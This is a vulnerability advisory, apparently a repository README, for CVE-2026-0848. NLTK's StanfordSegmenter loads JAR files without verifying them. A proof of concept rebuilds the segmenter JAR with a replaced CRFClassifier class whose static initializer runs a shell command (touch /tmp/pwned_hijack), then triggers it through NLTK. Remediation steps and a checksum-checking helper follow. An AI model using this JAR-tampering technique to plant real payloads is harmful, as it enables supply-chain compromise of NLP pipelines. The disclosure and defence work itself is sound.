# CVE-2026-0848 — NLTK StanfordSegmenter: Arbitrary Code Execution via Untrusted JAR Loading

---

## Overview

| Field | Details |
|---|---|
| **CVE ID** | CVE-2026-0848 |
| **Package** | `nltk` (Natural Language Toolkit) |
| **Registry** | PyPI |
| **Affected Versions** | `<= 3.9.2` |
| **Vulnerability Type** | CWE-20: Improper Input Validation |
| **CVSS Score** | 10.0 (Critical) |
| **Attack Vector** | Network |
| **Attack Complexity** | Low |
| **Privileges Required** | None |
| **User Interaction** | None |
| **Scope** | Changed |
| **Confidentiality Impact** | High |
| **Integrity Impact** | High |
| **Availability Impact** | High |
| **Reported On** | December 6, 2025 |
| **CVE Published** | March 2026 |
| **Supported By** | Palo Alto Networks / Prisma AIRS |

---

## Description

`nltk.tokenize.StanfordSegmenter` launches external Java `.jar` files via `subprocess` without performing any integrity verification, signature checking, or sandboxing. The class accepts attacker-controllable parameters, including `path_to_jar`, `path_to_model`, `path_to_dict`, and `java_class`, and passes them directly to a `java -cp` invocation.

If an attacker can supply or replace the JAR file (through a poisoned model download, a man-in-the-middle package swap, dependency poisoning, or a corrupted release mirror), arbitrary Java bytecode executes as soon as the JVM initializes the targeted class, because static initializer blocks run before any application logic. This constitutes a **supply-chain Remote Code Execution** vulnerability, and the injected code runs entirely outside the Python runtime.

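
To make the data flow concrete, here is a minimal sketch of how caller-supplied values can end up on a `java -cp` command line. It is not NLTK's code: `build_java_command` is a hypothetical helper written only for illustration, and the real logic lives in `nltk/internals.py`. The sketch assumes nothing beyond what the description states, namely that the JAR path and class name are forwarded without inspection.

```python
import os


def build_java_command(classpath_entries, java_class, extra_args=()):
    """Hypothetical illustration, not NLTK's implementation.

    Turns caller-supplied values into a `java -cp` argument list without
    looking at what the JAR files actually contain.
    """
    # The classpath is whatever the caller passed in: no hash, signature,
    # or trusted-directory check is applied at this point.
    classpath = os.pathsep.join(classpath_entries)
    return ["java", "-cp", classpath, java_class, *extra_args]


cmd = build_java_command(
    ["stanford-segmenter.jar"],
    "edu.stanford.nlp.ie.crf.CRFClassifier",
)
print(cmd)
```

Whoever controls the file behind the first classpath entry controls the bytecode the JVM runs for the named class, which is why the integrity of that file matters more than the Python code around it.
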
---

## Affected Components

| File | Lines | Description |
|---|---|---|
| `nltk/tokenize/stanford_segmenter.py` | L53–L118 | Accepts attacker-controlled `path_to_jar`, `path_to_model`, `path_to_dict`, and `java_class` with no validation |
| `nltk/internals.py` | L220–L300 | Launches Java execution directly with user-controlled JAR path and classpath, no sandboxing or checksum verification |
| `nltk/internals.py` | L109–L152 | `subprocess.Popen()` executes Java with unvalidated classpath input, allowing the JVM to load arbitrary bytecode and run static initializers |

---

## CVSS Vector

```
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
```

| Metric | Value |
|---|---|
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | None |
| Scope | Changed |
| Confidentiality | High |
| Integrity | High |
| Availability | High |

---

## Impact

Successful exploitation grants an attacker **full control over the system** running the NLTK segmentation process:

- **Arbitrary Java code execution:** any bytecode embedded in the malicious JAR runs with the privileges of the Python/Java process
- **Python runtime escape:** execution moves into the JVM, bypassing Python-level sandboxing entirely
- **OS-level command execution:** attackers can invoke `Runtime.getRuntime().exec()` or `ProcessBuilder` to run arbitrary shell commands
- **Data theft and modification:** access to all files, environment variables, API keys, and secrets readable by the process
- **Full environment compromise:** in CI/CD, production NLP pipelines, or server environments, a single malicious JAR leads to complete host takeover

### High-Risk Deployment Scenarios

| Scenario | Impact |
|---|---|
| ML researcher loads a pretrained segmenter from the internet | Remote attacker gains code execution |
| Organization downloads a corrupted Chinese segmentation model ZIP | Malware executes inside production NLP pipeline |
| CI/CD server installs model via `wget`/`unzip` from a non-HTTPS mirror | Full environment compromise |
| Dependency takeover or poisoned release mirror | Complete supply-chain RCE |

This vulnerability affects any NLP workflow using `StanfordSegmenter`, including chatbots, LLM preprocessing pipelines, dataset segmentation, document classification, and production inference services.

---

## Proof of Concept

> **This information is provided for educational and defensive purposes only. Do not test against systems you do not own or have explicit authorization to test.**

### Step 1: Replace Core Classifier with Malicious Java Class

```bash
# Work inside an extraction directory next to the original segmenter JAR
mkdir -p stanford-segmenter-2020-11-17/merged
cd stanford-segmenter-2020-11-17/merged

# Unpack the legitimate JAR and remove the class that will be replaced
jar xf ../stanford-segmenter-4.2.0.jar
rm -rf edu/stanford/nlp/ie/crf/CRFClassifier.class

# Write a replacement class whose static initializer carries the payload
cat << 'EOF' > edu/stanford/nlp/ie/crf/CRFClassifier.java
package edu.stanford.nlp.ie.crf;

public class CRFClassifier {
    static {
        try {
            System.out.println("\nPayload executed — Code ran on class load!\n");
            Runtime.getRuntime().exec("touch /tmp/pwned_hijack");
        } catch (Exception e) {}
    }

    public static void main(String[] args) {}
}
EOF

# Compile the replacement, repack, and overwrite the JAR that NLTK will load
javac edu/stanford/nlp/ie/crf/CRFClassifier.java
jar cfm exploit.jar META-INF/MANIFEST.MF *
cp exploit.jar ../stanford-segmenter.jar
```

### Step 2: Build the Malicious JAR

```bash
# Run from the directory that contains stanford-segmenter-4.2.0.jar
mkdir -p merged && cd merged

# Payload.java is not shown in this write-up; javac expects it in the current directory
javac Payload.java

# Merge the segmenter and CoreNLP JARs, then add the payload class
jar xf ../stanford-segmenter-4.2.0.jar
jar xf ../stanford-corenlp-4.2.0/stanford-corenlp-4.2.0.jar
jar cfm exploit.jar META-INF/MANIFEST.MF *
jar uf exploit.jar Payload.class
cp exploit.jar ../stanford-segmenter.jar
cd ..
```

### Step 3: Trigger via NLTK

```python
# test.py
from nltk.tokenize.stanford_segmenter import StanfordSegmenter

print("[+] Triggering payload via modified Stanford JAR...")

seg = StanfordSegmenter(
    path_to_jar="stanford-segmenter.jar",
    path_to_sihan_corpora_dict="./data/",
    path_to_dict="./data/dict-chris6.ser.gz",
    path_to_model="./data/pku.gz",
    java_class="edu.stanford.nlp.ie.crf.CRFClassifier",
    encoding="utf-8",
)

print("[+] Running segmentation...")
print(seg.segment("我爱自然语言处理"))
```

**Output:**

```
[+] Triggering payload via modified Stanford JAR...
Payload executed — Code ran on class load!
[+] Running segmentation...
我爱自然语言处理
```

**Confirm RCE:**

```bash
ls /tmp | grep pwned_hijack
# pwned_hijack
```

---

## Root Cause

The vulnerability exists across two files:

**`stanford_segmenter.py`**: The `StanfordSegmenter` class constructor accepts `path_to_jar`, `path_to_model`, `path_to_dict`, and `java_class` as plain string arguments and forwards them directly to the Java execution layer without performing any of the following:

- Path allowlist or trusted-directory enforcement
- SHA-256 or cryptographic signature verification of the JAR
- Validation of the `java_class` parameter against a known-safe set of class names

**`internals.py`**: The `java()` helper constructs and launches a `subprocess.Popen()` call with the user-supplied classpath. The JVM then loads and initializes the class named by `java_class` from that classpath, running its static initializer blocks before any application logic in `main` executes. There is no sandbox, no integrity gate, and no mechanism to prevent execution of injected bytecode.

---

## Fix

The vulnerability has been fully resolved in the upstream NLTK repository.

| Resource | Link |
|---|---|
| **Central Security Fix (all CVEs)** | https://github.com/nltk/nltk/pull/3522 |
| Researcher's initial fix PR | https://github.com/nltk/nltk/pull/3477 (merged) |

Upgrade to a patched version of NLTK as soon as it is available on PyPI.

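
Until a patched release is installed, the three checks listed as missing under Root Cause can be approximated on the caller side. The following is a minimal sketch, not the upstream fix: `check_segmenter_inputs`, `TRUSTED_JAR_DIR`, and `ALLOWED_JAVA_CLASSES` are hypothetical names introduced here, the directory path is a placeholder, and the expected digest must come from a JAR you have vetted yourself.

```python
import hashlib
from pathlib import Path

# Assumptions for illustration only: adjust both values to your deployment.
TRUSTED_JAR_DIR = Path("/opt/stanford-segmenter")
ALLOWED_JAVA_CLASSES = {"edu.stanford.nlp.ie.crf.CRFClassifier"}


def sha256_of(path, chunk_size=1 << 20):
    """Return the hex SHA-256 digest of a file, reading it in chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def check_segmenter_inputs(path_to_jar, java_class, expected_sha256,
                           trusted_dir=TRUSTED_JAR_DIR,
                           allowed_classes=ALLOWED_JAVA_CLASSES):
    """Return the resolved JAR path, or raise ValueError if any check fails."""
    jar = Path(path_to_jar).resolve()
    trusted = Path(trusted_dir).resolve()

    # 1. Trusted-directory enforcement; resolve() collapses ".." and symlinks.
    if trusted not in jar.parents:
        raise ValueError(f"{jar} is outside trusted directory {trusted}")

    # 2. Integrity check against a digest pinned by the caller.
    actual = sha256_of(jar)
    if actual != expected_sha256.lower():
        raise ValueError(f"SHA-256 mismatch for {jar}: got {actual}")

    # 3. Class-name allowlist.
    if java_class not in allowed_classes:
        raise ValueError(f"java_class {java_class!r} is not allowlisted")

    return str(jar)
```

A caller would pass the returned path as `path_to_jar` when constructing `StanfordSegmenter`. The check only narrows the window for tampering: a file replaced between verification and JVM launch would still run, so the JAR directory should also be read-only for the service account.
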
---

## Remediation

| Action | Details |
|---|---|
| **Upgrade NLTK** | Update to a version greater than 3.9.2 containing the fix from PR #3522 |
| **Do Not Use User-Controlled JAR Paths** | Never allow user input to influence `path_to_jar`, `path_to_model`, or `java_class` arguments |
| **Verify JAR Integrity** | Always verify SHA-256 checksums of downloaded JAR files against official published hashes before use |
| **Use HTTPS Sources Only** | Download model files and JARs exclusively from official HTTPS sources; reject any HTTP or unverified mirror |
| **Least Privilege** | Run NLTK-based services under a restricted OS user with minimal filesystem and network permissions |
| **Containerization** | Isolate NLP services in Docker containers or similar sandboxes to limit the blast radius of JAR-based exploits |
| **Dependency Monitoring** | Use a software composition analysis tool to detect tampered or replaced JAR dependencies in CI/CD pipelines |

**Upgrade via pip:**

```bash
pip install --upgrade nltk
```

**Verify installed version:**

```bash
python -c "import nltk; print(nltk.__version__)"
```

---

## Timeline

| Date | Event |
|---|---|
| December 6, 2025 | Vulnerability reported to huntr.dev by researcher hyperps1 (Sarvesh Patil) |
| December 2025 | NLTK maintainer team notified via huntr.dev |
| January 2026 | NLTK maintainer validated the vulnerability; disclosure bounty awarded |
| January 2026 | CVE-2026-0848 assigned |
| January 2026 | Researcher's fix PR #3477 submitted and merged |
| February 2026 | 48-hour pre-publication warning sent to NLTK maintainers |
| March 2026 | CVE published on NVD and huntr.dev |
| March 2026 | Central security fix for all CVEs merged via PR #3522 |

---

## References

| Resource | Link |
|---|---|
| NVD Entry | https://nvd.nist.gov/vuln/detail/CVE-2026-0848 |
| Official CVE Record | https://cve.org/CVERecord?id=CVE-2026-0848 |
| huntr.dev Report | https://huntr.dev |
| Central Fix PR | https://github.com/nltk/nltk/pull/3522 |
| Researcher Fix PR | https://github.com/nltk/nltk/pull/3477 |
| NLTK on PyPI | https://pypi.org/project/nltk/ |
| Stanford Word Segmenter | https://nlp.stanford.edu/software/segmenter.html |
| OWASP: Code Injection | https://owasp.org/www-community/attacks/Code_Injection |
| OWASP: Unsafe Use of Reflection | https://owasp.org/www-community/vulnerabilities/Unsafe_use_of_Reflection |
| CWE-20: Improper Input Validation | https://cwe.mitre.org/data/definitions/20.html |
| CWE-502: Deserialization of Untrusted Data | https://cwe.mitre.org/data/definitions/502.html |

---

## Disclaimer

This repository documents CVE-2026-0848 strictly for **educational, research, and defensive security purposes**. The proof-of-concept code and technical details are provided to assist developers, security engineers, and system administrators in understanding, assessing, and remediating this vulnerability. Any use of this information to access or compromise systems without explicit authorization is illegal and unethical. The author assumes no liability for misuse of the information contained herein.

Contributors: [ketanHub](https://github.com/ketanHub)